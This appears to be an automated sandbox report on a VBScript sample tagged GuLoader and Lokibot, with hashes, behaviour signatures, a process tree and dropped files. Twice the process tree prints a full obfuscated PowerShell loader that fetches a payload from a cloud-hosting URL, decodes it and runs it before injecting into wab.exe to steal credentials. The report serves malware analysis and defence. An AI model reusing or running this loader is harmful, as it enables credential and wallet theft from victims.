Overview

overview

10

Static

static

1

.vbs

windows7-x64

10

.vbs

windows10-2004-x64

10

Analysis

  • max time kernel
    148s
  • max time network
    127s
  • platform
    windows7_x64
  • resource
    win7-20240903-en
  • resource tags

    arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
  • submitted
    05-09-2024 14:38

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    .vbs

  • Size

    21KB

  • MD5

    1fda25d2ec636086e7ad9bc6cd47dad9

  • SHA1

    1508e030e55585c467534260dcb43ac50cbc88f7

  • SHA256

    d6c4f50e58d0d8f0e7d63c1efc9679beb855d6c27d0af1417c852b0f820a3ff6

  • SHA512

    aabfbf4d7086c8af67697d4db02989145ee9812cdced64d519905600f510d1a67d00d56de175209ce2602e31eeaf517cdddcb8f7f578eace29ef1d3d8c31e4ca

  • SSDEEP

    192:/8z8yaVDEgoxLcSJ7LXnlUeZFrQ8bOjQ8dNVDLu7gswBfpGHlehYk13jxcvhwGI/:NpUL3yezrQEIXV5sOxKCjxGYiVZ2cbg

Score
10/10
guloaderlokibotcollectioncredential_accessdiscoverydownloaderspywarestealertrojan

Malware Config

Signatures

  • Guloader,Cloudeye

    A shellcode based downloader first seen in 2020.

    downloaderguloader
  • Lokibot

    Lokibot is a Password and CryptoCoin Wallet Stealer.

    trojanspywarestealerlokibot
  • Credentials from Password Stores: Credentials from Web Browsers 1 TTPs

    Malicious Access or copy of Web Browser Credential store.

    credential_accessstealer
  • Blocklisted process makes network request 2 IoCs
  • Accesses Microsoft Outlook profiles 1 TTPs 3 IoCs
    collection
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs
  • Network Service Discovery 1 TTPs 2 IoCs

    Attempt to gather information on host's network.

    discovery
  • Suspicious use of NtCreateThreadExHideFromDebugger 2 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • System Location Discovery: System Language Discovery 1 TTPs 3 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

    discovery
  • Suspicious behavior: EnumeratesProcesses 3 IoCs
  • Suspicious behavior: MapViewOfSection 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 3 IoCs
  • Suspicious use of WriteProcessMemory 24 IoCs
  • outlook_office_path 1 IoCs
  • outlook_win_path 1 IoCs

Processes

  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\.vbs"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:1636
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "If (${host}.Name) {$Varsledes++;$Sorbile+='subst';$Sorbile+='r';}$Sorbile+='ing';Function Kubikindholds($Snarfed){$Vvstypernes=$Snarfed.Length-$Varsledes;For( $Indklag=5;$Indklag -lt $Vvstypernes;$Indklag+=6){$Elevcentreret+=$Snarfed.$Sorbile.'Invoke'( $Indklag, $Varsledes);}$Elevcentreret;}function Unilobe($Cellulden){ . ($Launcelot) ($Cellulden);}$Unindifferent=Kubikindholds 'DaterMbeccaoIn opzBossaiContulSo orlEmb.paSpend/Lingb5Frost.Polyg0Dean Dusin(GobelWTnpksiGastrnCreatdHallio leliwMo,essJonno ReprNChionTPhyto Orth1Free,0Fras .Kicka0 ,rja;Morge MlsheW etoiD.strnCessm6Austr4s yrk;Klask Handlx,alla6 anlg4.nake;Genk A,eknrGangtvBlgen:Va.da1Preal2Rearr1 V,da.Marin0Nrreb)Subst TumulG,dhule hjemcrealmkAa,unoAc,di/ P,te2 nona0Quen,1Undsk0 Nske0Sibir1 P il0Ankyl1oo dd InfeFGollyi TomrrAguace A atfHoggeo helxUd li/Orake1Pir e2Enc p1Kalle.Snurr0Retur ';$nonmetaphoric=Kubikindholds 'Ac,tyUBu des Asiae Iterr Nons-Ub.haASeksugSpotme Ops nPho.otPensi ';$Obsternasiges=Kubikindholds 'naiv,hMuscotObta,tHonnip GudssErhol: nadu/Accr./RematdR.llerBeri iAndelvpoulteInge,.SjlekgBilafoAnatooU.ambgnattel S.yteBnkev.NonthcSvel.oAtenkm Grey/ v,ntuK nvoctaffe?Omhege Amatx RedepHypoaope.plrSp.kutUncom=CaucadOp.olo CritwL,ftfnAn,delUnfiboSkareaGenskdThank&Re,roiZi.zidBrneh=Raask1 indwBFletks VejnaSkm.ezUdtryKYucatUCagelmGrnsasTu.ta_Enerkz.onidiTrencPCan,irTax muRetsaOUnderBknstnQS.wmaBRecon2RetinTS.ilnL DsecVContrT,imhrQCanto9Dubleg Eu,oldekupnGnathPChromWFuli.W.rypvSSto.a ';$Lagorchestes=Kubikindholds 'Gldse> Ba.h ';$Launcelot=Kubikindholds 'KudskiUndiseAirinxDifte ';$Superfusion='Pensionsbeskatningers';$savanner = Kubikindholds 'FlotaeNa ivcNyklahRegaroDeict Heste%Imbeca Offip andep Se vdOmposaE,tontHol.taDadle% Natu\dlgs,DM.dtpa Sti tFde,aaTilkriAnsponCarpod pectuA,sensRustvtMalc,rkoloniGar veHjnesnstillsSmaas.HrelsH bevboFo.kem Co f I.tun&Guil,&Chape weede P,lac RanghBeefioPyro, OpanktWo.eg ';Unilobe (Kubikindholds ' Tese$tropagBid,rlunbruo Pr db KommaBefr,lOpskr: RidshScuttoC.ralvNotedeB.eddd RenttForbrrMa slaAfkapp OverpIschieB.omdrUguns= Linn(H stocSpildm SoledO lys valg/BelsicHorse Unjo$byttesDilleaSplejvS,lgsaAn.ronH.rpunAdjoueAnator Skid)Horse ');Unilobe (Kubikindholds 'frisk$SpringudmellRevi o Shitb ,icraLsrepl Bjer:AlarmSBowyacEcta.l .urreOsteorArgenobascotSterriarchccSup,re Flakc Parat BencoPeri,mMutisyIn.ru= Zal.$ b spOSk.erbPos isA,turt,ftereFedtsrMak wnovereaKapitsUhuemi Myogg OrieeVers.siniti.SammesUnlicpwoolmlAfstuiTi fat Byg.(,krsl$BestnLSawmaa U,twgGoingoD,strrPhil,c Ov.rh Jaeve.ortvsS nketLs tieSpr.csnorma)Jodel ');Unilobe (Kubikindholds 'Workw[,ordmNSmalfeUhaantWirel.RancoSArithe SprorFo.tuvIndtriInecocHalvve.nrecPSt.mno GodkiA inonPerift FiltMbrownaUnpaynGlassaAfsvogAr,hre PansrV,cuu] Batt:Godto:CharaSArboreTjanscKjartu Madorkaffei Aft.tFjermyAnecdPM,dderImp eoIntrat MalloForudcKllino UnfalStign Svarb=Lasto Regul[LooseNDismeeBek.otdi.em.BrfruStilste Legec ogikuForharCompli SteatLsbl.yMdeplPExcitrClyfjoCantet Klono AdrecUdsk oTytteldige.TSeraiy.athlpMang,eSda g]Itera:Zw.es: UnhuTStigml Hi,bs G.sp1Ordbo2Incom ');$Obsternasiges=$Scleroticectomy[0];$Speedaway= (Kubikindholds ' Prvn$Pittig.ltraltrpseoNonrebKon.raBrndel ,ntw: CompBSuperr MarkiMil,anInt.mkGennelRin.eeeyesos IrrisOensk=FircyNInscre SkrawDy sp- nanoOGalopbSude,jPhobieIntercBlan,tEpilo BrushSEffr y UblosZoo itgriseeDraabm Ma k. drivNHor.eeStamktLlebr. JuliW Motoe d,reb AdmiCm.sall FortiUndere L ckn,ndert');$Speedaway+=$hovedtrapper[1];Unilobe ($Speedaway);Unilobe (Kubikindholds ' Fls,$neokoBTusslrUagtsiTilrenPudd.kRame.lAnknyeo.ertsQui ts D kl.Uops.H ReaneRing.aTeenidKondee OrierSoldasSoves[ Bli,$Syll n tskroFam.lnDiv,dm NavieFluidtBushbafagblpVermihA.bejoTyrogrMinipiBlankcCance] Kapr=Halef$ ExraUCoum.n OroniRinken jarodOpponi SerifSociaf svaneH.emmrNevoyeberninStridtNitro ');$Grafisk=Kubikindholds 'Tryll$ PicqBSmurrr LeveiDefennjv,frk RevelHexageGrammsFarvesT,tma.NephiDBoomaoProgrw BergnDis.vl I,paoFiks,aProdsdCapenFHnsehio inilDalmae Deli( Reve$TilbjOSrilabFdestsBackbtPaab.eDagdrrniogtnEuspoa JustsForekiUkammgSupereRestisDoddl,Halvd$PenetCMess l Comparep,eyTr.gle Writr Fort)P,rib ';$Clayer=$hovedtrapper[0];Unilobe (Kubikindholds 'Lunke$SolrigTegnilalacroSnothbPredea Kronlklatp:AsparW Satuepim,daAlloppMetaloCh,linArbejsFr.tahunpo o,fspew CranicranknhousegLtapp=Urban(VoldtTG.fsteBedrasVandbt Sm.l-StrggPKloseaFa.llttripohN.nco Billi$HaffiCNephrlIntera UpstyForm.eFo.ler Fidd)sjld, ');while (!$Weaponshowing) {Unilobe (Kubikindholds ' Roqu$A,lergsereul SeisosekunbdisguaC,villnab.e:ImmutDPunktuGe.minVandtdRee.seS.rfsrCl.nohFremmeforaeaAntagdBeslu=Skov $ nwastblksprHe.eruDili eStrid ') ;Unilobe $Grafisk;Unilobe (Kubikindholds ' sta SElem.tCreataKomm,rSoldytBer g-LegalSSootyl HisteFlockelu tepBehag Houri4T,ist ');Unilobe (Kubikindholds 'Touph$ unkgJuleflSkubboVellib Nyttaop,ralEu,hl:LoxodWBew,aebedelaSubb,pFes.fo Besyn BedrsAkkorhFor,ioGoverwO.ocoiBickinPusteg Spro=Insul( lothT.ysiueHalsesNedsttTod,y-Pro iPkra.sa Spe,tDelilh Brdr Haa d$ GunsCVirksl Liv aRespiyGenn.e Tilsr dhoo) War, ') ;Unilobe (Kubikindholds 'Lettj$ un.eg ParalCent,oaleyabKo deaApri,l,kole:VelgrFP,ecooFirt,rAlimesIdeo.tSkifta,isvaemessirMeannkDhobeeM.nipdS,mone utils .pho2Afr g0T.bor6Jomfr=Lod,r$ latog SprolMaadeoUsurpbPrveraForhalEugen:DistrKBe,luoGjetonVrdigtKutt r ConfoUnsobl.ndept,yrenaB tses B.rttBlegs+Baill+Pe io%Forga$M croSSaty.cStilfl.ideoeDegenrHandeoGarnit valiiSupercgudsfe nmacLe,igt Cou o B,camSh.ovyOutre.PerficAs eroChemouFluepnAnilit amsa ') ;$Obsternasiges=$Scleroticectomy[$Forstaerkedes206];}$Ungaged=335988;$Broderligt=29831;Unilobe (Kubikindholds 'Skema$janusgGrocelUnwitoSlvs.bHaa daSpunsl Red.:PapirPGr.nia UndelemploeEtvrerTheocmRav.ro esti Stnin=Tipti MagneG Cl.ceSeemlt,ecid-.lotsCEkstroPlektnTrosktarchmeSupplnScotttK.lde Ask.t$U gifCPreswlAdactaE uesyOpbygeU derrUtthe ');Unilobe (Kubikindholds 'Buo s$ArthrgFast,l Tomlo IsawbM.gneasem plHersk:S bkoS ameite stdNigh.eStilloAbsurvExcureF,rdjr UndesO.cilkCimicrUdlgniPotstfPantutGensie InacnBistas Cuda Antip=Grosz Dulse[VerdeSSap.iyCoar.sVera tHalvfe B vemOvere. forlCParado.rotan jengv ,ndfecykelrBom.etWh.ck]Disin:Udtry:B vidFAktuarAesthoRituamBordkBKontoaE,flasPaludeBluff6 .nol4HeadbSIndtet SukkrP.mmii AsatnDomingDerac(Luxat$Om.avP DisaaCl.ssl un,eeBeskfrScytom.emipo In.u).vamp ');Unilobe (Kubikindholds 'opf.t$MemengObsculStry o klynbnelumaKursulWhiff:Subp,B,nbeteUpbartPackwa MicrlMill,bSlaglaPolypr Stbl Ident=Drikk Skogg[.ausaSMakroyTatersKristtMillaeStenbmTrito.MiddeT T.kmeSamlexSyndatMusel.SmreoEArle,nBlvrecparago,tormd StatiA,mban,attegUdebl]Fetis: Un e:SmokeAPartiSA itaCAirteIVersiI Be,r.ArmerGReosteDreidtTa seSstatitF,rhar OveriFar.onV.abegYameo(Fored$ SpejSSi,bei edtd.uldeeKevino Rheiv UphoeDiskrrOver sImplik PapirFinani,afetfI distIn.ogeS,allnMilkssBr om)Lustr ');Unilobe (Kubikindholds 'Aflev$Slettg ,stfl Ekspo VandbDrilaa SenalOmtal:AntipATabl,eRavior EvtroPolynl Bidfi,ilintSelvhhJohanoUnneglInteroElectgGrundyS,ofe=Strai$ N,nsBMatemeAcadet npanaBankelKnebebBarreaNglesr ,inm.EvangsVisc uRrlgnbHeu.gs acobt Uni.r pdyriDehy.nTransgT,lef(Gl,co$LiebhU dfrincrakog velsaBrdlsgBate,eFremsd erhv, .lin$ ynamBSe,asrEdriooSrlindmadeleHistorUf kslIncenistempgK,lletpande) Hype ');Unilobe $Aerolithology;"
      2⤵
      • Blocklisted process makes network request
      • Network Service Discovery
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:2516
      • C:\Windows\system32\cmd.exe
        "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Dataindustriens.Hom && echo t"
        3⤵
          PID:828
        • C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "If (${host}.Name) {$Varsledes++;$Sorbile+='subst';$Sorbile+='r';}$Sorbile+='ing';Function Kubikindholds($Snarfed){$Vvstypernes=$Snarfed.Length-$Varsledes;For( $Indklag=5;$Indklag -lt $Vvstypernes;$Indklag+=6){$Elevcentreret+=$Snarfed.$Sorbile.'Invoke'( $Indklag, $Varsledes);}$Elevcentreret;}function Unilobe($Cellulden){ . ($Launcelot) ($Cellulden);}$Unindifferent=Kubikindholds 'DaterMbeccaoIn opzBossaiContulSo orlEmb.paSpend/Lingb5Frost.Polyg0Dean Dusin(GobelWTnpksiGastrnCreatdHallio leliwMo,essJonno ReprNChionTPhyto Orth1Free,0Fras .Kicka0 ,rja;Morge MlsheW etoiD.strnCessm6Austr4s yrk;Klask Handlx,alla6 anlg4.nake;Genk A,eknrGangtvBlgen:Va.da1Preal2Rearr1 V,da.Marin0Nrreb)Subst TumulG,dhule hjemcrealmkAa,unoAc,di/ P,te2 nona0Quen,1Undsk0 Nske0Sibir1 P il0Ankyl1oo dd InfeFGollyi TomrrAguace A atfHoggeo helxUd li/Orake1Pir e2Enc p1Kalle.Snurr0Retur ';$nonmetaphoric=Kubikindholds 'Ac,tyUBu des Asiae Iterr Nons-Ub.haASeksugSpotme Ops nPho.otPensi ';$Obsternasiges=Kubikindholds 'naiv,hMuscotObta,tHonnip GudssErhol: nadu/Accr./RematdR.llerBeri iAndelvpoulteInge,.SjlekgBilafoAnatooU.ambgnattel S.yteBnkev.NonthcSvel.oAtenkm Grey/ v,ntuK nvoctaffe?Omhege Amatx RedepHypoaope.plrSp.kutUncom=CaucadOp.olo CritwL,ftfnAn,delUnfiboSkareaGenskdThank&Re,roiZi.zidBrneh=Raask1 indwBFletks VejnaSkm.ezUdtryKYucatUCagelmGrnsasTu.ta_Enerkz.onidiTrencPCan,irTax muRetsaOUnderBknstnQS.wmaBRecon2RetinTS.ilnL DsecVContrT,imhrQCanto9Dubleg Eu,oldekupnGnathPChromWFuli.W.rypvSSto.a ';$Lagorchestes=Kubikindholds 'Gldse> Ba.h ';$Launcelot=Kubikindholds 'KudskiUndiseAirinxDifte ';$Superfusion='Pensionsbeskatningers';$savanner = Kubikindholds 'FlotaeNa ivcNyklahRegaroDeict Heste%Imbeca Offip andep Se vdOmposaE,tontHol.taDadle% Natu\dlgs,DM.dtpa Sti tFde,aaTilkriAnsponCarpod pectuA,sensRustvtMalc,rkoloniGar veHjnesnstillsSmaas.HrelsH bevboFo.kem Co f I.tun&Guil,&Chape weede P,lac RanghBeefioPyro, OpanktWo.eg ';Unilobe (Kubikindholds ' Tese$tropagBid,rlunbruo Pr db KommaBefr,lOpskr: RidshScuttoC.ralvNotedeB.eddd RenttForbrrMa slaAfkapp OverpIschieB.omdrUguns= Linn(H stocSpildm SoledO lys valg/BelsicHorse Unjo$byttesDilleaSplejvS,lgsaAn.ronH.rpunAdjoueAnator Skid)Horse ');Unilobe (Kubikindholds 'frisk$SpringudmellRevi o Shitb ,icraLsrepl Bjer:AlarmSBowyacEcta.l .urreOsteorArgenobascotSterriarchccSup,re Flakc Parat BencoPeri,mMutisyIn.ru= Zal.$ b spOSk.erbPos isA,turt,ftereFedtsrMak wnovereaKapitsUhuemi Myogg OrieeVers.siniti.SammesUnlicpwoolmlAfstuiTi fat Byg.(,krsl$BestnLSawmaa U,twgGoingoD,strrPhil,c Ov.rh Jaeve.ortvsS nketLs tieSpr.csnorma)Jodel ');Unilobe (Kubikindholds 'Workw[,ordmNSmalfeUhaantWirel.RancoSArithe SprorFo.tuvIndtriInecocHalvve.nrecPSt.mno GodkiA inonPerift FiltMbrownaUnpaynGlassaAfsvogAr,hre PansrV,cuu] Batt:Godto:CharaSArboreTjanscKjartu Madorkaffei Aft.tFjermyAnecdPM,dderImp eoIntrat MalloForudcKllino UnfalStign Svarb=Lasto Regul[LooseNDismeeBek.otdi.em.BrfruStilste Legec ogikuForharCompli SteatLsbl.yMdeplPExcitrClyfjoCantet Klono AdrecUdsk oTytteldige.TSeraiy.athlpMang,eSda g]Itera:Zw.es: UnhuTStigml Hi,bs G.sp1Ordbo2Incom ');$Obsternasiges=$Scleroticectomy[0];$Speedaway= (Kubikindholds ' Prvn$Pittig.ltraltrpseoNonrebKon.raBrndel ,ntw: CompBSuperr MarkiMil,anInt.mkGennelRin.eeeyesos IrrisOensk=FircyNInscre SkrawDy sp- nanoOGalopbSude,jPhobieIntercBlan,tEpilo BrushSEffr y UblosZoo itgriseeDraabm Ma k. drivNHor.eeStamktLlebr. JuliW Motoe d,reb AdmiCm.sall FortiUndere L ckn,ndert');$Speedaway+=$hovedtrapper[1];Unilobe ($Speedaway);Unilobe (Kubikindholds ' Fls,$neokoBTusslrUagtsiTilrenPudd.kRame.lAnknyeo.ertsQui ts D kl.Uops.H ReaneRing.aTeenidKondee OrierSoldasSoves[ Bli,$Syll n tskroFam.lnDiv,dm NavieFluidtBushbafagblpVermihA.bejoTyrogrMinipiBlankcCance] Kapr=Halef$ ExraUCoum.n OroniRinken jarodOpponi SerifSociaf svaneH.emmrNevoyeberninStridtNitro ');$Grafisk=Kubikindholds 'Tryll$ PicqBSmurrr LeveiDefennjv,frk RevelHexageGrammsFarvesT,tma.NephiDBoomaoProgrw BergnDis.vl I,paoFiks,aProdsdCapenFHnsehio inilDalmae Deli( Reve$TilbjOSrilabFdestsBackbtPaab.eDagdrrniogtnEuspoa JustsForekiUkammgSupereRestisDoddl,Halvd$PenetCMess l Comparep,eyTr.gle Writr Fort)P,rib ';$Clayer=$hovedtrapper[0];Unilobe (Kubikindholds 'Lunke$SolrigTegnilalacroSnothbPredea Kronlklatp:AsparW Satuepim,daAlloppMetaloCh,linArbejsFr.tahunpo o,fspew CranicranknhousegLtapp=Urban(VoldtTG.fsteBedrasVandbt Sm.l-StrggPKloseaFa.llttripohN.nco Billi$HaffiCNephrlIntera UpstyForm.eFo.ler Fidd)sjld, ');while (!$Weaponshowing) {Unilobe (Kubikindholds ' Roqu$A,lergsereul SeisosekunbdisguaC,villnab.e:ImmutDPunktuGe.minVandtdRee.seS.rfsrCl.nohFremmeforaeaAntagdBeslu=Skov $ nwastblksprHe.eruDili eStrid ') ;Unilobe $Grafisk;Unilobe (Kubikindholds ' sta SElem.tCreataKomm,rSoldytBer g-LegalSSootyl HisteFlockelu tepBehag Houri4T,ist ');Unilobe (Kubikindholds 'Touph$ unkgJuleflSkubboVellib Nyttaop,ralEu,hl:LoxodWBew,aebedelaSubb,pFes.fo Besyn BedrsAkkorhFor,ioGoverwO.ocoiBickinPusteg Spro=Insul( lothT.ysiueHalsesNedsttTod,y-Pro iPkra.sa Spe,tDelilh Brdr Haa d$ GunsCVirksl Liv aRespiyGenn.e Tilsr dhoo) War, ') ;Unilobe (Kubikindholds 'Lettj$ un.eg ParalCent,oaleyabKo deaApri,l,kole:VelgrFP,ecooFirt,rAlimesIdeo.tSkifta,isvaemessirMeannkDhobeeM.nipdS,mone utils .pho2Afr g0T.bor6Jomfr=Lod,r$ latog SprolMaadeoUsurpbPrveraForhalEugen:DistrKBe,luoGjetonVrdigtKutt r ConfoUnsobl.ndept,yrenaB tses B.rttBlegs+Baill+Pe io%Forga$M croSSaty.cStilfl.ideoeDegenrHandeoGarnit valiiSupercgudsfe nmacLe,igt Cou o B,camSh.ovyOutre.PerficAs eroChemouFluepnAnilit amsa ') ;$Obsternasiges=$Scleroticectomy[$Forstaerkedes206];}$Ungaged=335988;$Broderligt=29831;Unilobe (Kubikindholds 'Skema$janusgGrocelUnwitoSlvs.bHaa daSpunsl Red.:PapirPGr.nia UndelemploeEtvrerTheocmRav.ro esti Stnin=Tipti MagneG Cl.ceSeemlt,ecid-.lotsCEkstroPlektnTrosktarchmeSupplnScotttK.lde Ask.t$U gifCPreswlAdactaE uesyOpbygeU derrUtthe ');Unilobe (Kubikindholds 'Buo s$ArthrgFast,l Tomlo IsawbM.gneasem plHersk:S bkoS ameite stdNigh.eStilloAbsurvExcureF,rdjr UndesO.cilkCimicrUdlgniPotstfPantutGensie InacnBistas Cuda Antip=Grosz Dulse[VerdeSSap.iyCoar.sVera tHalvfe B vemOvere. forlCParado.rotan jengv ,ndfecykelrBom.etWh.ck]Disin:Udtry:B vidFAktuarAesthoRituamBordkBKontoaE,flasPaludeBluff6 .nol4HeadbSIndtet SukkrP.mmii AsatnDomingDerac(Luxat$Om.avP DisaaCl.ssl un,eeBeskfrScytom.emipo In.u).vamp ');Unilobe (Kubikindholds 'opf.t$MemengObsculStry o klynbnelumaKursulWhiff:Subp,B,nbeteUpbartPackwa MicrlMill,bSlaglaPolypr Stbl Ident=Drikk Skogg[.ausaSMakroyTatersKristtMillaeStenbmTrito.MiddeT T.kmeSamlexSyndatMusel.SmreoEArle,nBlvrecparago,tormd StatiA,mban,attegUdebl]Fetis: Un e:SmokeAPartiSA itaCAirteIVersiI Be,r.ArmerGReosteDreidtTa seSstatitF,rhar OveriFar.onV.abegYameo(Fored$ SpejSSi,bei edtd.uldeeKevino Rheiv UphoeDiskrrOver sImplik PapirFinani,afetfI distIn.ogeS,allnMilkssBr om)Lustr ');Unilobe (Kubikindholds 'Aflev$Slettg ,stfl Ekspo VandbDrilaa SenalOmtal:AntipATabl,eRavior EvtroPolynl Bidfi,ilintSelvhhJohanoUnneglInteroElectgGrundyS,ofe=Strai$ N,nsBMatemeAcadet npanaBankelKnebebBarreaNglesr ,inm.EvangsVisc uRrlgnbHeu.gs acobt Uni.r pdyriDehy.nTransgT,lef(Gl,co$LiebhU dfrincrakog velsaBrdlsgBate,eFremsd erhv, .lin$ ynamBSe,asrEdriooSrlindmadeleHistorUf kslIncenistempgK,lletpande) Hype ');Unilobe $Aerolithology;"
          3⤵
          • Network Service Discovery
          • Suspicious use of NtSetInformationThreadHideFromDebugger
          • Suspicious use of SetThreadContext
          • System Location Discovery: System Language Discovery
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious behavior: MapViewOfSection
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:2856
          • C:\Windows\SysWOW64\cmd.exe
            "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Dataindustriens.Hom && echo t"
            4⤵
            • System Location Discovery: System Language Discovery
            PID:2272
          • C:\Program Files (x86)\windows mail\wab.exe
            "C:\Program Files (x86)\windows mail\wab.exe"
            4⤵
              PID:2616
            • C:\Program Files (x86)\windows mail\wab.exe
              "C:\Program Files (x86)\windows mail\wab.exe"
              4⤵
              • Accesses Microsoft Outlook profiles
              • Suspicious use of NtCreateThreadExHideFromDebugger
              • Suspicious use of NtSetInformationThreadHideFromDebugger
              • System Location Discovery: System Language Discovery
              • Suspicious use of AdjustPrivilegeToken
              • outlook_office_path
              • outlook_win_path
              PID:2664

      Network

      MITRE ATT&CK Enterprise v15

      Replay Monitor

      Loading Replay Monitor...

      Downloads

      • C:\Users\Admin\AppData\Roaming\Dataindustriens.Hom
        Filesize

        476KB

        MD5

        a12f1e6450070a7f2881a51263cdfc64

        SHA1

        8079638e5132fc2af18b10559606f0771695c9fa

        SHA256

        c3e31b916fcd5901033734d674d401d6b986d80806969cdd9a9ae0faafcaa389

        SHA512

        4a35b4166e1f29b078a64745f6f8684234d17d46708556f83e60d2b010c8b8686cd058cd95e630723e8e28f18962e0aefb5bdf1552e3281ed1ee2708158caf8b

        Download Submit

      • C:\Users\Admin\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-1846800975-3917212583-2893086201-1000\0f5007522459c86e95ffcc62f32308f1_f9da27c9-c625-43c3-9b3a-b1344b01e128
        Filesize

        46B

        MD5

        d898504a722bff1524134c6ab6a5eaa5

        SHA1

        e0fdc90c2ca2a0219c99d2758e68c18875a3e11e

        SHA256

        878f32f76b159494f5a39f9321616c6068cdb82e88df89bcc739bbc1ea78e1f9

        SHA512

        26a4398bffb0c0aef9a6ec53cd3367a2d0abf2f70097f711bbbf1e9e32fd9f1a72121691bb6a39eeb55d596edd527934e541b4defb3b1426b1d1a6429804dc61

        Download Submit

      • C:\Users\Admin\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-1846800975-3917212583-2893086201-1000\0f5007522459c86e95ffcc62f32308f1_f9da27c9-c625-43c3-9b3a-b1344b01e128
        Filesize

        46B

        MD5

        c07225d4e7d01d31042965f048728a0a

        SHA1

        69d70b340fd9f44c89adb9a2278df84faa9906b7

        SHA256

        8c136c7ae08020ad16fd1928e36ad335ddef8b85906d66b712fff049aa57dc9a

        SHA512

        23d3cea738e1abf561320847c39dadc8b5794d7bd8761b0457956f827a17ad2556118b909a3e6929db79980ccf156a6f58ac823cf88329e62417d2807b34b64b

        Download Submit

      • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\K92SZRHQBDLOQT7Q60DW.temp
        Filesize

        7KB

        MD5

        119cda652e698c6d8ed2f1d94a4647ca

        SHA1

        e0d42b6114503bbc01bb78f580a5b671438fd942

        SHA256

        68193e6499be420ef3b67b24a2c897640971edfdde27bc4879f3fc8bad948fa7

        SHA512

        71e47be122c538a1c7716c070833535f1e634b707d32899b7ea34b342a1a214658071bdd51e2165b4de653df840f57282d63feca2f1b97512b0b9d39a6bbecb5

        Download Submit

      • memory/2516-13-0x000007FEF628E000-0x000007FEF628F000-memory.dmp

        Filesize

        4KB

        Download

      • memory/2516-9-0x000007FEF5FD0000-0x000007FEF696D000-memory.dmp

        Filesize

        9.6MB

        Download

      • memory/2516-10-0x000007FEF5FD0000-0x000007FEF696D000-memory.dmp

        Filesize

        9.6MB

        Download

      • memory/2516-12-0x000007FEF5FD0000-0x000007FEF696D000-memory.dmp

        Filesize

        9.6MB

        Download

      • memory/2516-4-0x000007FEF628E000-0x000007FEF628F000-memory.dmp

        Filesize

        4KB

        Download

      • memory/2516-8-0x000007FEF5FD0000-0x000007FEF696D000-memory.dmp

        Filesize

        9.6MB

        Download

      • memory/2516-7-0x000007FEF5FD0000-0x000007FEF696D000-memory.dmp

        Filesize

        9.6MB

        Download

      • memory/2516-41-0x000007FEF5FD0000-0x000007FEF696D000-memory.dmp

        Filesize

        9.6MB

        Download

      • memory/2516-6-0x0000000001F00000-0x0000000001F08000-memory.dmp

        Filesize

        32KB

        Download

      • memory/2516-5-0x000000001B740000-0x000000001BA22000-memory.dmp

        Filesize

        2.9MB

        Download

      • memory/2664-39-0x0000000000400000-0x0000000000581000-memory.dmp

        Filesize

        1.5MB

        Download

      • memory/2664-40-0x0000000000D70000-0x00000000053D4000-memory.dmp

        Filesize

        70.4MB

        Download

      • memory/2856-18-0x0000000006530000-0x000000000AB94000-memory.dmp

        Filesize

        70.4MB

        Download